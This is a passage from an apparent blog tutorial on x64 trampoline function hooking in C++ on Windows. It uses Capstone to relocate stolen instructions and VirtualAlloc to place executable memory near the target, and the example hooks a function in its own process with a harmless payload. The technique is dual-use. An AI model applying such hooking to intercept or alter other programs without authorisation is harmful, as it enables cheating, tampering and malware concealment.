<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>The snippet below shows how these new functions should be added to BuildTrampoline(). Notice that we need to wait until after calling these new rewrite functions before we can increment the absTableMem pointer.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of a 64 bit mov/jmp instruction pair</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span> <span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_LOOP</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_LOOPNE</span><span class="p">){</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//bail out on loop instructions, I don't have a good way of handling them </span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">IsRelativeJump</span><span class="p">(</span><span class="n">inst</span><span class="p">)){</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddJmpToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">RewriteJumpInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">){</span>
<span class="kt">uint32_t</span> <span class="n">aitSize</span> <span class="o">=</span> <span class="n">AddCallToAbsTable</span><span class="p">(</span><span class="n">inst</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">,</span> <span class="n">jumpBackMem</span><span class="p">);</span>
<span class="n">RewriteCallInstruction</span><span class="p">(</span><span class="o">&</span><span class="n">inst</span><span class="p">,</span> <span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">absTableMem</span><span class="p">);</span>
<span class="n">absTableMem</span> <span class="o">+=</span> <span class="n">aitSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//write stolen instruction (rewritten or otherwise) to trmapoline mem</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//write jump back to hooked func</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
<span class="k">return</span> <span class="kt">uint32_t</span><span class="p">(</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">absTableMem</span> <span class="o">-</span> <span class="n">dstMemForTrampoline</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<h3 id="step-5-write-the-jump-back-to-the-hooked-functions-body">Step 5: Write the Jump Back to the Hooked Function’s Body</h3>
<p>This has been a long process, but we’re almost there. Now we need to fill in the middle of the jump sandwich, and return our trampoline’s size. After all the work we’ve done so far, this last step doesn’t need much explanation. All we need to do is replace the comment in the snippet above with the following:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">jumpBackMem</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="mi">5</span><span class="p">);</span></code></pre></figure>
<p>When we stole the bytes from func2hook, we also replaced them with NOP instructions. This makes our life easier here, since the jump back to our hooked function doesn’t have to care about the number of bytes we stole. Jumping to the byte immediately after the hook’s jump is guaranteed to be safe.</p>
<p>Finally we return the byte count of our trampoline, so that InstallHook() can write the relay function into memory right after our trampoline bytes.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>aaaaand we’re done! The collapsebox below shows the full source for a program that uses this trampoline to hook a function. We’ve already talked about all the fun parts, so I’m going to leave it here without comment and move on to the grand finale.</p>
<div class="collapsewrapper2">
<details class="collapsible">
<summary>Full Example of Trampoline Hooking a Function In The Same Process As The Hook Code</summary>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="cp">#include <stdio.h>
#include <cstdlib>
#include "capstone/x86.h"
#include "capstone/capstone.h"
#include <vector>
#include <Windows.h>
</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">noinline</span><span class="p">)</span> <span class="kt">void</span> <span class="nf">TargetFunc</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">x</span> <span class="o">></span> <span class="mi">0</span><span class="p">)</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Target Func: x > 0</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">TargetFuncTrampoline</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">float</span><span class="p">)</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">HookPayload</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hook executed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">TargetFuncTrampoline</span><span class="p">(</span><span class="n">x</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="n">y</span><span class="p">);</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">AllocatePageNearAddress</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">SYSTEM_INFO</span> <span class="n">sysInfo</span><span class="p">;</span>
<span class="n">GetSystemInfo</span><span class="p">(</span><span class="o">&</span><span class="n">sysInfo</span><span class="p">);</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">PAGE_SIZE</span> <span class="o">=</span> <span class="n">sysInfo</span><span class="p">.</span><span class="n">dwPageSize</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">startAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">(</span><span class="n">targetAddr</span><span class="p">)</span> <span class="o">&</span> <span class="o">~</span><span class="p">(</span><span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="mi">1</span><span class="p">));</span> <span class="c1">//round down to nearest page boundary</span>
<span class="kt">uint64_t</span> <span class="n">minAddr</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMinimumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">maxAddr</span> <span class="o">=</span> <span class="n">max</span><span class="p">(</span><span class="n">startAddr</span> <span class="o">+</span> <span class="mh">0x7FFFFF00</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">sysInfo</span><span class="p">.</span><span class="n">lpMaximumApplicationAddress</span><span class="p">);</span>
<span class="kt">uint64_t</span> <span class="n">startPage</span> <span class="o">=</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">-</span> <span class="p">(</span><span class="n">startAddr</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">));</span>
<span class="kt">uint64_t</span> <span class="n">pageOffset</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">byteOffset</span> <span class="o">=</span> <span class="n">pageOffset</span> <span class="o">*</span> <span class="n">PAGE_SIZE</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">highAddr</span> <span class="o">=</span> <span class="n">startPage</span> <span class="o">+</span> <span class="n">byteOffset</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">lowAddr</span> <span class="o">=</span> <span class="p">(</span><span class="n">startPage</span> <span class="o">></span> <span class="n">byteOffset</span><span class="p">)</span> <span class="o">?</span> <span class="n">startPage</span> <span class="o">-</span> <span class="n">byteOffset</span> <span class="o">:</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">needsExit</span> <span class="o">=</span> <span class="n">highAddr</span> <span class="o">></span> <span class="n">maxAddr</span> <span class="o">&&</span> <span class="n">lowAddr</span> <span class="o"><</span> <span class="n">minAddr</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">highAddr</span> <span class="o"><</span> <span class="n">maxAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// we need details enabled for relocating RIP relative instrs</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace instructions in target func wtih NOPs</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeJump</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isAnyJumpInstruction</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">>=</span> <span class="n">X86_INS_JAE</span> <span class="o">&&</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o"><=</span> <span class="n">X86_INS_JS</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">isJmp</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_JMP</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithEBorE9</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xEB</span> <span class="o">||</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE9</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isJmp</span> <span class="o">?</span> <span class="n">startsWithEBorE9</span> <span class="o">:</span> <span class="n">isAnyJumpInstruction</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">bool</span> <span class="nf">IsRelativeCall</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">bool</span> <span class="n">isCall</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">X86_INS_CALL</span><span class="p">;</span>
<span class="kt">bool</span> <span class="n">startsWithE8</span> <span class="o">=</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0xE8</span><span class="p">;</span>
<span class="k">return</span> <span class="n">isCall</span> <span class="o">&&</span> <span class="n">startsWithE8</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteJumpInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//jmp instructions can have a 1 or 2 byte opcode, and need a 1-4 byte operand</span>
<span class="c1">//rewrite the operand for the jump to go to the jump table</span>
<span class="kt">uint8_t</span> <span class="n">instrByteSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mh">0x0F</span> <span class="o">?</span> <span class="mi">2</span> <span class="o">:</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">uint8_t</span> <span class="n">operandSize</span> <span class="o">=</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span> <span class="o">-</span> <span class="n">instrByteSize</span><span class="p">;</span>
<span class="k">switch</span> <span class="p">(</span><span class="n">operandSize</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">case</span> <span class="mi">1</span><span class="p">:</span> <span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">]</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">2</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint16_t</span> <span class="n">dist16</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist16</span><span class="p">,</span> <span class="mi">2</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="k">case</span> <span class="mi">4</span><span class="p">:</span> <span class="p">{</span><span class="kt">uint32_t</span> <span class="n">dist32</span> <span class="o">=</span> <span class="n">distToJumpTable</span><span class="p">;</span> <span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">[</span><span class="n">instrByteSize</span><span class="p">],</span> <span class="o">&</span><span class="n">dist32</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span> <span class="p">}</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">RewriteCallInstruction</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">*</span> <span class="n">instr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">instrPtr</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableEntry</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">distToJumpTable</span> <span class="o">=</span> <span class="kt">uint8_t</span><span class="p">(</span><span class="n">absTableEntry</span> <span class="o">-</span> <span class="p">(</span><span class="n">instrPtr</span> <span class="o">+</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">));</span>
<span class="c1">//calls need to be rewritten as relative jumps to the abs table</span>
<span class="c1">//but we want to preserve the length of the instruction, so pad with NOPs</span>
<span class="kt">uint8_t</span> <span class="n">jmpBytes</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xEB</span><span class="p">,</span> <span class="n">distToJumpTable</span> <span class="p">};</span>
<span class="n">memset</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">instr</span><span class="o">-></span><span class="n">size</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">instr</span><span class="o">-></span><span class="n">bytes</span><span class="p">,</span> <span class="n">jmpBytes</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpBytes</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">AddJmpToAbsTable</span><span class="p">(</span><span class="n">cs_insn</span><span class="o">&</span> <span class="n">jmp</span><span class="p">,</span> <span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">targetAddrStr</span> <span class="o">=</span> <span class="n">jmp</span><span class="p">.</span><span class="n">op_str</span><span class="p">;</span> <span class="c1">//where the instruction intended to go</span>
